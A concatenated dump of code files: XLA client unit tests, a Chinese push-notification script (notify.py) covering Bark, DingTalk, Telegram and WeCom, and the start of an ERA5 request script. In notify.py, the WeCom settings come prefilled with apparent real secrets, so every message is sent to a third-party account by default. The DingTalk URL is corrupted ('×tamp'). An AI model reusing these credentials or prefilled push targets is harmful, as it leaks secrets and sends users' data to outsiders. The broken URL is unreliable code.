c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
# Set Sharding.
c.SetSharding(sharding)
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
# Clear Sharding.
c.ClearSharding()
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
notify.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import json
import os
import re
import threading
import time
import urllib.parse
import requests
# the original print function and a lock shared by the main thread and workers
_print = print
mutex = threading.Lock()
# define a new, thread-safe print function
def print(text, *args, **kw):
    """
    Serialize output so that messages printed by multiple threads at the same
    time are not interleaved.
    """
    with mutex:
        _print(text, *args, **kw)
# notification services
# fmt: off
push_config = {
    'HITOKOTO': False,  # enable hitokoto (append a random sentence)
    'BARK_PUSH': '',  # required: bark IP or device key, e.g. https://api.day.app/DxHcxxxxxRxxxxxxcm/
    'BARK_ARCHIVE': '',  # whether bark pushes are archived
    'BARK_GROUP': '',  # bark push group
    'BARK_SOUND': '',  # bark push sound
    'BARK_ICON': '',  # bark push icon
    'CONSOLE': False,  # console output
    'DD_BOT_SECRET': '',  # required: DD_BOT_SECRET of the DingTalk bot
    'DD_BOT_TOKEN': '',  # required: DD_BOT_TOKEN of the DingTalk bot
    'FSKEY': '',  # required: FSKEY of the Feishu bot
    'GOBOT_URL': '',  # required: go-cqhttp
    # push to a personal QQ: http://127.0.0.1/send_private_msg
    # push to a group:       http://127.0.0.1/send_group_msg
    'GOBOT_QQ': '',  # required: the go-cqhttp target group or user
    # when GOBOT_URL ends with /send_private_msg, fill in user_id=<personal QQ>
    # when it ends with /send_group_msg, fill in group_id=<QQ group>
    'GOBOT_TOKEN': '',  # required: access_token of go-cqhttp
    'GOTIFY_URL': '',  # required: gotify address, e.g. https://push.example.de:8080
    'GOTIFY_TOKEN': '',  # required: gotify application message token
    'GOTIFY_PRIORITY': 0,  # push message priority, defaults to 0
    'IGOT_PUSH_KEY': '',  # IGOT_PUSH_KEY for iGot aggregated push
    'PUSH_KEY': '',  # PUSH_KEY of ServerChan, compatible with both the legacy and the Turbo version
    'PUSH_PLUS_TOKEN': '',  # required: user token for push+ WeChat push
    'PUSH_PLUS_USER': '',  # group code for push+ WeChat push
    'QMSG_KEY': '',  # QMSG_KEY of qmsg
    'QMSG_TYPE': '',  # QMSG_TYPE of qmsg
    'QYWX_AM': 'ww8a8648d68b7891f6,NGapOO7wq_4tjy1GB0ibv94yFkvpwsEun3H-dupZvto,@all,1000001',  # corpid,corpsecret,touser (separate multiple member IDs with |),agentid,message type (optional, defaults to plain text); separate the fields with ASCII commas, e.g. wwcfrs,B-76WERQ,qinglong,1000001,2COat
    'QYWX_KEY': '454589e4-1e3d-4e33-9e46-8877e2f729b5',  # WeCom (WeChat Work) group bot key
    'TG_BOT_TOKEN': '',  # required: TG_BOT_TOKEN of the Telegram bot, e.g. 1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
    'TG_USER_ID': '',  # required: TG_USER_ID of the Telegram bot, e.g. 1434078534
    'TG_API_HOST': '',  # Telegram proxy api host
    'TG_PROXY_AUTH': '',  # Telegram proxy auth parameters
    'TG_PROXY_HOST': '',  # TG_PROXY_HOST for the Telegram bot
    'TG_PROXY_PORT': '',  # TG_PROXY_PORT for the Telegram bot
}
notify_function = []
# fmt: on
# first read variables from the panel or from the GitHub Actions run environment
for k in push_config:
if os.getenv(k):
v = os.getenv(k)
push_config[k] = v
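# Hedged illustration (not part of the original script): any key above can be
# supplied through the environment instead of editing this file, e.g. in a
# shell before running the job (the value below is an example only):
#   export BARK_PUSH="https://api.day.app/your_device_key"
#   python notify.py
# The os.getenv() loop above then picks the value up and overrides push_config.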
def bark(title: str, content: str) -> None:
    """
    Push a message via Bark.
    """
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
"BARK_ICON": "icon",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
    """
    Print the message to the console.
    """
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
    """
    Push a message via a DingTalk bot.
    """
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
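# A minimal, self-contained sketch of the DingTalk signing step used above,
# pulled out into a helper purely for illustration (the helper name is not part
# of the original module; the algorithm mirrors the code in dingding_bot):
def _dingtalk_sign(secret: str, timestamp: str) -> str:
    """Return the url-encoded base64 HMAC-SHA256 signature DingTalk expects."""
    string_to_sign = f"{timestamp}\n{secret}".encode("utf-8")
    hmac_code = hmac.new(secret.encode("utf-8"), string_to_sign, digestmod=hashlib.sha256).digest()
    return urllib.parse.quote_plus(base64.b64encode(hmac_code))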
def feishu_bot(title: str, content: str) -> None:
    """
    Push a message via a Feishu (Lark) bot.
    """
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
    """
    Push a message via go-cqhttp.
    """
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def gotify(title: str, content: str) -> None:
    """
    Push a message via gotify.
    """
    if not push_config.get("GOTIFY_URL") or not push_config.get("GOTIFY_TOKEN"):
        print("gotify 服务的 GOTIFY_URL 或 GOTIFY_TOKEN 未设置!!\n取消推送")
        return
    print("gotify 服务启动")
    url = f'{push_config.get("GOTIFY_URL")}/message?token={push_config.get("GOTIFY_TOKEN")}'
    data = {"title": title, "message": content, "priority": push_config.get("GOTIFY_PRIORITY")}
    response = requests.post(url, data=data).json()
    if response.get("id"):
        print("gotify 推送成功!")
    else:
        print("gotify 推送失败!")
def iGot(title: str, content: str) -> None:
    """
    Push a message via iGot.
    """
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
    """
    Push a message via ServerChan (serverJ).
    """
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
    if "SCT" in push_config.get("PUSH_KEY"):
        url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
    else:
        url = f'https://sc.ftqq.com/{push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
    """
    Push a message via push+ (pushplus).
    """
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
url_old = "http://pushplus.hxtrip.com/send"
headers["Accept"] = "application/json"
response = requests.post(url=url_old, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS(hxtrip) 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
    """
    Push a message via qmsg.
    """
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
    """
    Push a message via the WeCom (WeChat Work) application.
    """
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
    if len(QYWX_AM_AY) not in (4, 5):
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
    # if media_id is not configured, fall back to sending a plain text message
if not media_id:
message = title + "\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
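# Hedged usage sketch for the WeCom class above (the credentials below are
# placeholders, not real values; wecom_app() shows the full flow this module
# actually uses):
#   wx = WeCom("your_corpid", "your_corpsecret", "1000001")
#   print(wx.send_text("hello from notify.py", touser="@all"))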
def wecom_bot(title: str, content: str) -> None:
    """
    Push a message via a WeCom (WeChat Work) group bot.
    """
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
    """
    Push a message via a Telegram bot.
    """
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
    """
    Fetch a single "hitokoto" (a random sentence).
    :return: the sentence followed by its source
    """
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("GOTIFY_URL") and push_config.get("GOTIFY_TOKEN"):
notify_function.append(gotify)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
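# Hedged usage note: this module is typically imported by other task scripts
# rather than run directly, e.g.
#   from notify import send
#   send("Task finished", "details of the run ...")
# The exact import path depends on where notify.py lives in your project.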
|
ecmwf_era5_request.py
|
#!/usr/bin/python3
"""
